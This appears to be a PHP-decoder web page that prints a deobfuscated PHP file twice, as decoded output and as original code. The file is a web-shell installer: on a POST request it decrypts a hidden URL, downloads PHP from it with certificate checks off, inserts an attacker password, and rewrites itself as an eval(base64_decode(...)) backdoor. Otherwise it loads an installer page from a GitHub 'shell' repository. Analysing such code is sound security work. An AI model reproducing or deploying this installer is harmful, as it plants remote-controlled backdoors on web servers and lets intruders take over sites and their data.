Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Don't change anything otherwise this code does not work. ...........
Decoded Output download
<?php
/*
Don't change anything otherwise this code does not work.
..........Developer...........
. .
. *** Samiul Alim *** .
. [email protected] .
. fb : samiul.alim.1230 .
. tg : samiulalim1230 .
. .
..............................
Copyright 2023
*/
goto SEcN6; J5Ux5: function createFileFopen($file, $data) { $fileHandle = fopen($file, "w"); if ($fileHandle === false) { return false; } else { $bytesWritten = fwrite($fileHandle, $data); fclose($fileHandle); if ($bytesWritten !== false) { return true; } else { return false; } } } goto SoP_E; oGV0N: $mr999plus = str_replace("\", "/", __DIR__) . "/" . basename(__FILE__); goto RdDrx; MWZ3b: function string_to_octal($str) { $rtn = ''; $chars = str_split($str); foreach ($chars as $c) { $rtn .= "\" . str_pad(base_convert(ord($c), 10, 8), 3, 0, STR_PAD_LEFT); } return $rtn; } goto J5Ux5; RdDrx: function getDecode($encode) { $key = "SamiulAlim"; $chiper = "AES-128-CTR"; $iv = hex2bin("2c269a65037c190f4994f11c0f1e37c0"); return openssl_decrypt($encode, $chiper, $key, 0, $iv); } goto ZWtfo; ZWtfo: function getContent($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36")); $output = curl_exec($curl); curl_close($curl); return $output; } goto MWZ3b; SoP_E: if (isset($_POST["password"], $_POST["version"], $_POST["colour"])) { $password = string_to_octal($_POST["password"]); $version = explode("|SHELL|", getDecode($_POST["version"])); $php = getContent($version[0]); $index = string_to_octal($version[1]); $script = string_to_octal($version[2]); $style = string_to_octal(getDecode($_POST["colour"])); if ($php == '') { $result["success"] = false; $result["msg"] = "Install failed!"; } else { $install = "<?php eval(base64_decode('" . base64_encode(str_replace("|HACKER|", $password, str_replace("|SCRIPT|", $script, str_replace("|STYLE|", $style, str_replace("|INDEX|", $index, $php))))) . "')); ?>"; if (createFileFopen($mr999plus, $install)) { $result["success"] = true; } else { if (file_get_contents($mr999plus, $install)) { $result["success"] = true; $result["msg"] = "Installed successfully!"; } else { $result["success"] = false; $result["msg"] = "Install permission denied!"; } } } header("Content-Type: application/json; charset=utf-8"); die(json_encode($result)); } else { echo getContent("https://github.com/samiulalim1/shell/raw/main/install/index.html"); } goto LTYUP; SEcN6: error_reporting(0); goto oGV0N; LTYUP:
?>
Did this file decode correctly?
Original Code
<?php
/*
Don't change anything otherwise this code does not work.
..........Developer...........
. .
. *** Samiul Alim *** .
. [email protected] .
. fb : samiul.alim.1230 .
. tg : samiulalim1230 .
. .
..............................
Copyright 2023
*/
goto SEcN6; J5Ux5: function createFileFopen($file, $data) { $fileHandle = fopen($file, "w"); if ($fileHandle === false) { return false; } else { $bytesWritten = fwrite($fileHandle, $data); fclose($fileHandle); if ($bytesWritten !== false) { return true; } else { return false; } } } goto SoP_E; oGV0N: $mr999plus = str_replace("\", "/", __DIR__) . "/" . basename(__FILE__); goto RdDrx; MWZ3b: function string_to_octal($str) { $rtn = ''; $chars = str_split($str); foreach ($chars as $c) { $rtn .= "\" . str_pad(base_convert(ord($c), 10, 8), 3, 0, STR_PAD_LEFT); } return $rtn; } goto J5Ux5; RdDrx: function getDecode($encode) { $key = "SamiulAlim"; $chiper = "AES-128-CTR"; $iv = hex2bin("2c269a65037c190f4994f11c0f1e37c0"); return openssl_decrypt($encode, $chiper, $key, 0, $iv); } goto ZWtfo; ZWtfo: function getContent($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36")); $output = curl_exec($curl); curl_close($curl); return $output; } goto MWZ3b; SoP_E: if (isset($_POST["password"], $_POST["version"], $_POST["colour"])) { $password = string_to_octal($_POST["password"]); $version = explode("|SHELL|", getDecode($_POST["version"])); $php = getContent($version[0]); $index = string_to_octal($version[1]); $script = string_to_octal($version[2]); $style = string_to_octal(getDecode($_POST["colour"])); if ($php == '') { $result["success"] = false; $result["msg"] = "Install failed!"; } else { $install = "<?php eval(base64_decode('" . base64_encode(str_replace("|HACKER|", $password, str_replace("|SCRIPT|", $script, str_replace("|STYLE|", $style, str_replace("|INDEX|", $index, $php))))) . "')); ?>"; if (createFileFopen($mr999plus, $install)) { $result["success"] = true; } else { if (file_get_contents($mr999plus, $install)) { $result["success"] = true; $result["msg"] = "Installed successfully!"; } else { $result["success"] = false; $result["msg"] = "Install permission denied!"; } } } header("Content-Type: application/json; charset=utf-8"); die(json_encode($result)); } else { echo getContent("https://github.com/samiulalim1/shell/raw/main/install/index.html"); } goto LTYUP; SEcN6: error_reporting(0); goto oGV0N; LTYUP:
?>
Function Calls
None |
Stats
MD5 | 8d6821f54fbbca83b55619b90527fcff |
Eval Count | 0 |
Decode Time | 63 ms |